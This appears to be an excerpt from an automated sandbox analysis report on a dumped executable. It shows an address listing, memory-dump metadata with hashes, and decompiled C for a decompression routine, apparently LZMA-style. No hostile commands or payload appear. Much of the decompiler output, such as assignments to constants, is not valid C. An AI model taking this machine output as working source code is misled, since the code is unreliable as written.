                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00000000
                                                                                                                          0x00406784
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                          • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                                                                                                          • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                          • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405DF9, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405DF9(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040684B))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
